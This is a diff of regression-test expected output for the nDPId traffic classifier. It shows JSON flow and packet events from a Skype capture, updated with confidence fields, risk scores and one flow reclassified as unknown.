 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431970685921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970685921,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0NCRAAPQGWplbvtp9wKgBIjA+yFR61rIKJRYCg4ASH\/4KBwAAAgQFoAEDAwQBAQQC"}
@@ -797,24 +797,23 @@
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1431970686381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431970686381,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoqoZAAEAGmEPAqAEiW77afchVMD6WWeS3Rpk1L1AQIACoYAAA"}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1431970686624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431970686624,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoWF8AAEARnvLAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1431970686627,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431970686627,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr8AAEABX8bAqAEBwKgBIgMDgJYAAAAARQAAKFhfAABAEZ7ywKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="}
-00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1368,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970682971,"flow_last_seen":1431970686763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3635,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1431970686763,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1368,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970682971,"flow_last_seen":1431970686763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3635,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1431970686763,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1368,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970682971,"flow_last_seen":1431970686763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3635,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1431970686763,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686843,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970686843,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970686843,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXdpAAEAG5NfAqAEiW77afchWAbv9gi8BAAAAALAC\/\/+4gAAAAgQFtAEDAwUBAQgKPjJRrgAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1431970686906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970686906,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0rxlAAPQG36Nbvtp9wKgBIgG7yFakF93g\/YIvAoASH\/7ehAAAAgQFoAEDAwQBAQQC"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1431970686906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431970686906,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoj59AAEAGsyrAqAEiW77afchWAbv9gi8CpBfd4VAQIAAfPgAA"}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431970687261,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431970687261,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuS7AAAEAREzPAqAEirjGr4DLdfQsAGuTOfB8CfeyODsgiOuU1SIeok9yn"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAurJcAAEARrJHAqAEiUx8MrTLdXYMAGpfYfCECZ7K5p+bX8n+OJOOTrcyv"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuSakAAEAREGnAqAEivYqhWDLdTEEAGhcdfCMC1zNoLOVTJhFFmEsFrmck"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOf4AAEAROozAqAEivbyGrjLdV6QAGoKkfCUCWKDpreHeWqMtL4LNh6CD"}
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjTxAAEAG\/gPAqAEiTKehBshYTzLHdCWnAAAAALAC\/\/\/vzwAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -829,10 +828,10 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431970687953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970687953,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06CNAAEAGoyjAqAEiTKehBshYTzLHdCWoEv4emIAQECx16wAAAQEICj4yVfS+r7gZ"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431970688025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431970688025,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOK8AAEARxlrAqAEib91KDjLdAbsAGqZSfFUC4vleo7UvMvPmsU4YCKBd"}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431970688320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431970688320,"pkt":"0NQSxnP1PBXCt3IOCABFAAAukPgAAEARnzfAqAEinTfrjTLdAbsAGuidfHYCyiJR+IygHiSHdyp3P0rG"}
-00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688560,"flow_last_seen":1431970688560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970688560,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431970688560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970688560,"pkt":"0NQSxnP1PBXCt3IOCABFAABALZlAAEAGrHTAqAEiUVNNjchbROcBp2a0AAAAALAC\/\/\/KOQAAAgQFtAEDAwUBAQgKPjJYSAAAAAAEAgAA"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431970688626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970688626,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8CBlAAHQGnfhRU02NwKgBIkTnyFsYw7jOAadmtaASIADTOAAAAgQFrAEDAwgEAggKALwVrD4yWEg="}
@@ -851,14 +850,14 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431970689742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970689742,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ToBAAEAGi5nAqAEiUVNNjcheROdnq4JWnrqPT4AQECwuuQAAAQEICj4yXNIAvBYb"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431970690133,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1431970690133,"pkt":"0NQSxnP1PBXCt3IOCABFAABEeJ0AAEARfpjAqAEiwKgBAemMADUAMK9udVgBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="}
